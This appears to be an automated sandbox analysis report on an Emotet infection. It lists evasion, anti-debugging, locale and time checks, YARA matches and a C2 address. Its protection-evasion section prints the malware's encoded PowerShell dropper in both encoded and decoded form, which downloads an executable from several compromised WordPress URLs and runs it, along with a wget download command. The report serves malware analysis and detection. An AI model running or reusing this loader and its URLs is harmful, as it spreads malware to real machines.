Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\546.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\546.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\546.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\546.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Windows\SysWOW64\driverthunk.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Contains functionality to enumerate running servicesShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,14_2_00F8CCBC
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3185Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 716Jump to behavior
Found evasive API chain (date check)Show sources
Source: C:\Users\user\546.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_11-33344
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\546.exeAPI coverage: 2.2 %
Source: C:\Users\user\546.exeAPI coverage: 1.8 %
Source: C:\Windows\SysWOW64\driverthunk.exeAPI coverage: 9.9 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5308Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2036Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5352Thread sleep time: -922337203685477s >= -30000sJump to behavior
Checks the free space of harddrivesShow sources
Source: C:\Users\user\546.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\546.exeCode function: 11_2_00442282 lstrlenA,FindFirstFileA,FindClose,11_2_00442282
Source: C:\Users\user\546.exeCode function: 12_2_00442282 lstrlenA,FindFirstFileA,FindClose,12_2_00442282
Source: C:\Users\user\546.exeCode function: 12_2_004417BA __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,12_2_004417BA
Contains functionality to query system informationShow sources
Source: C:\Users\user\546.exeCode function: 11_2_0041F6CF VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,11_2_0041F6CF
Program exit pointsShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\driverthunk.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\driverthunk.exeAPI call chain: ExitProcess graph end node
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\546.exeCode function: 11_2_00438EC2 GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,11_2_00438EC2
Contains functionality to read the PEBShow sources
Source: C:\Users\user\546.exeCode function: 12_2_0040B930 mov eax, dword ptr fs:[00000030h]12_2_0040B930
Source: C:\Users\user\546.exeCode function: 12_2_0040BA70 mov eax, dword ptr fs:[00000030h]12_2_0040BA70
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 13_2_00E00467 mov eax, dword ptr fs:[00000030h]13_2_00E00467
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 13_2_00E00C0C mov eax, dword ptr fs:[00000030h]13_2_00E00C0C
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 13_2_00E01743 mov eax, dword ptr fs:[00000030h]13_2_00E01743
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 13_2_00E212CD mov eax, dword ptr fs:[00000030h]13_2_00E212CD
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 13_2_00E21E04 mov eax, dword ptr fs:[00000030h]13_2_00E21E04
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F60467 mov eax, dword ptr fs:[00000030h]14_2_00F60467
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F60C0C mov eax, dword ptr fs:[00000030h]14_2_00F60C0C
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F61743 mov eax, dword ptr fs:[00000030h]14_2_00F61743
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F812CD mov eax, dword ptr fs:[00000030h]14_2_00F812CD
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 14_2_00F81E04 mov eax, dword ptr fs:[00000030h]14_2_00F81E04
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 13_2_00E214F2 GetProcessHeap,RtlAllocateHeap,13_2_00E214F2
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\546.exeCode function: 11_2_00423FA0 SetUnhandledExceptionFilter,11_2_00423FA0
Source: C:\Users\user\546.exeCode function: 12_2_00423FA0 SetUnhandledExceptionFilter,12_2_00423FA0

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $Cbwdzqxhxzag='Ptfuijtku';$Ltzgzdbzmmhrn = '546';$Dcfgxbuefewx='Ombgyxqrx';$Tcprooprzhgsb=$env:userprofile+'\'+$Ltzgzdbzmmhrn+'.exe';$Wfobrhhi='Ucrcylhckwi';$Lvqbmohyoits=&('new-obje'+'c'+'t') Net.wEbcLIEnt;$Cjcstmzloq='http://home.mu4viet.net/wp-includes/hddg0/*http://demo.tuzlapaslanmaz.com/wp-admin/sj33/*http://coalitionbay.com/nysri/iiI/*https://jebkhata.com/wp-includes/8l8yd7/*https://bigdataprofile.com/d8bhg/7mf/'."S`PLIt"([char]42);$Uhinpybm='Dawfcnxopo';foreach($Pvlgrfunja in $Cjcstmzloq){try{$Lvqbmohyoits."DOw`NLOaD`FILE"($Pvlgrfunja, $Tcprooprzhgsb);$Jkezljomwuyd='Jtsjhboqnbcg';If ((.('Get-I'+'tem') $Tcprooprzhgsb)."LENG`TH" -ge 23511) {([wmiclass]'win32_Process')."c`REATE"($Tcprooprzhgsb);$Hskizyxjpns='Pjcslhddwfgs';break;$Wcxfeyzpbnvt='Kcwpcvbezk'}}catch{}}$Mjlndqufagsin='Zhowslrttirp'
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k' Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e JABDAGIAdwBkAHoAcQB4AGgAeAB6AGEAZwA9ACcAUAB0AGYAdQBpAGoAdABrAHUAJwA7ACQATAB0AHoAZwB6AGQAYgB6AG0AbQBoAHIAbgAgAD0AIAAnADUANAA2ACcAOwAkAEQAYwBmAGcAeABiAHUAZQBmAGUAdwB4AD0AJwBPAG0AYgBnAHkAeABxAHIAeAAnADsAJABUAGMAcAByAG8AbwBwAHIAegBoAGcAcwBiAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABMAHQAegBnAHoAZABiAHoAbQBtAGgAcgBuACsAJwAuAGUAeABlACcAOwAkAFcAZgBvAGIAcgBoAGgAaQA9ACcAVQBjAHIAYwB5AGwAaABjAGsAdwBpACcAOwAkAEwAdgBxAGIAbQBvAGgAeQBvAGkAdABzAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABOAGUAdAAuAHcARQBiAGMATABJAEUAbgB0ADsAJABDAGoAYwBzAHQAbQB6AGwAbwBxAD0AJwBoAHQAdABwADoALwAvAGgAbwBtAGUALgBtAHUANAB2AGkAZQB0AC4AbgBlAHQALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBoAGQAZABnADAALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAHQAdQB6AGwAYQBwAGEAcwBsAGEAbgBtAGEAegAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AcwBqADMAMwAvACoAaAB0AHQAcAA6AC8ALwBjAG8AYQBsAGkAdABpAG8AbgBiAGEAeQAuAGMAbwBtAC8AbgB5AHMAcgBpAC8AaQBpAEkALwAqAGgAdAB0AHAAcwA6AC8ALwBqAGUAYgBrAGgAYQB0AGEALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADgAbAA4AHkAZAA3AC8AKgBoAHQAdABwAHMAOgAvAC8AYgBpAGcAZABhAHQAYQBwAHIAbwBmAGkAbABlAC4AYwBvAG0ALwBkADgAYgBoAGcALwA3AG0AZgAvACcALgAiAFMAYABQAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVQBoAGkAbgBwAHkAYgBtAD0AJwBEAGEAdwBmAGMAbgB4AG8AcABvACcAOwBmAG8AcgBlAGEAYwBoACgAJABQAHYAbABnAHIAZgB1AG4AagBhACAAaQBuACAAJABDAGoAYwBzAHQAbQB6AGwAbwBxACkAewB0AHIAeQB7ACQATAB2AHEAYgBtAG8AaAB5AG8AaQB0AHMALgAiAEQATwB3AGAATgBMAE8AYQBEAGAARgBJAEwARQAiACgAJABQAHYAbABnAHIAZgB1AG4AagBhACwAIAAkAFQAYwBwAHIAbwBvAHAAcgB6AGgAZwBzAGIAKQA7ACQASgBrAGUAegBsAGoAbwBtAHcAdQB5AGQAPQAnAEoAdABzAGoAaABiAG8AcQBuAGIAYwBnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAVABjAHAAcgBvAG8AcAByAHoAaABnAHMAYgApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMwA1ADEAMQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwBgAFIARQBBAFQARQAiACgAJABUAGMAcAByAG8AbwBwAHIAegBoAGcAcwBiACkAOwAkAEgAcwBrAGkAegB5AHgAagBwAG4AcwA9ACcAUABqAGMAcwBsAGgAZABkAHcAZgBnAHMAJwA7AGIAcgBlAGEAawA7ACQAVwBjAHgAZgBlAHkAegBwAGIAbgB2AHQAPQAnAEsAYwB3AHAAYwB2AGIAZQB6AGsAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQBqAGwAbgBkAHEAdQBmAGEAZwBzAGkAbgA9ACcAWgBoAG8AdwBzAGwAcgB0AHQAaQByAHAAJwA=
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k' Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\546.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,11_2_0043040A
Source: C:\Users\user\546.exeCode function: GetLocaleInfoA,MultiByteToWideChar,11_2_004304C6
Source: C:\Users\user\546.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,11_2_0043053A
Source: C:\Users\user\546.exeCode function: GetLocaleInfoW,WideCharToMultiByte,11_2_004305ED
Source: C:\Users\user\546.exeCode function: GetLocaleInfoA,11_2_0042E6F5
Source: C:\Users\user\546.exeCode function: GetLocaleInfoA,_strncpy,11_2_0042C932
Source: C:\Users\user\546.exeCode function: _strlen,EnumSystemLocalesA,11_2_0042CE51
Source: C:\Users\user\546.exeCode function: _strlen,_strlen,EnumSystemLocalesA,11_2_0042CE88
Source: C:\Users\user\546.exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat,11_2_0042CF63
Source: C:\Users\user\546.exeCode function: _strlen,EnumSystemLocalesA,11_2_0042CF0E
Source: C:\Users\user\546.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_004010A0
Source: C:\Users\user\546.exeCode function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,11_2_0045515B
Source: C:\Users\user\546.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,12_2_0043040A
Source: C:\Users\user\546.exeCode function: GetLocaleInfoA,MultiByteToWideChar,12_2_004304C6
Source: C:\Users\user\546.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,12_2_0043053A
Source: C:\Users\user\546.exeCode function: GetLocaleInfoW,WideCharToMultiByte,12_2_004305ED
Source: C:\Users\user\546.exeCode function: GetLocaleInfoA,12_2_0042E6F5
Source: C:\Users\user\546.exeCode function: GetLocaleInfoA,_strncpy,12_2_0042C932
Source: C:\Users\user\546.exeCode function: _strlen,EnumSystemLocalesA,12_2_0042CE51
Source: C:\Users\user\546.exeCode function: _strlen,_strlen,EnumSystemLocalesA,12_2_0042CE88
Source: C:\Users\user\546.exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat,12_2_0042CF63
Source: C:\Users\user\546.exeCode function: _strlen,EnumSystemLocalesA,12_2_0042CF0E
Source: C:\Users\user\546.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,12_2_004010A0
Source: C:\Users\user\546.exeCode function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,12_2_0045515B
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\546.exeCode function: 11_2_00429505 cpuid 11_2_00429505
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\SysWOW64\wget.exeQueries volume information: C:\Users\user\Desktop\download VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Users\user\546.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\546.exeCode function: 11_2_00426F6E GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,11_2_00426F6E
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\546.exeCode function: 11_2_00428AE7 __lock,_strlen,_strcat,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy,11_2_00428AE7
Contains functionality to query windows versionShow sources
Source: C:\Users\user\546.exeCode function: 11_2_0040E151 GetVersion,GetEnvironmentVariableW,GetEnvironmentVariableW,InterlockedExchange,11_2_0040E151
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\SysWOW64\wget.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected EmotetShow sources
Source: Yara matchFile source: 0000000C.00000002.4443946272.0000000002290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.4392825244.00000000020E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.4734087079.0000000000F81000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.4734046172.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.4436765350.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.4436809034.0000000000E21000.00000020.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\Users\user\546.exeCode function: 11_2_00459431 CreateBindCtx,lstrlenW,lstrlenA,CoTaskMemFree,11_2_00459431
Source: C:\Users\user\546.exeCode function: 12_2_00459431 CreateBindCtx,lstrlenW,lstrlenA,CoTaskMemFree,12_2_00459431
Source: C:\Users\user\546.exeCode function: 12_2_00459A4B lstrlenA,lstrlenW,lstrlenW,lstrlenW,CoTaskMemAlloc,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,12_2_00459A4B

Malware Configuration

Threatname: Emotet

{"C2 list": ["209.146.22.34/cZ0e2Pg5vIvmxy2"]}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
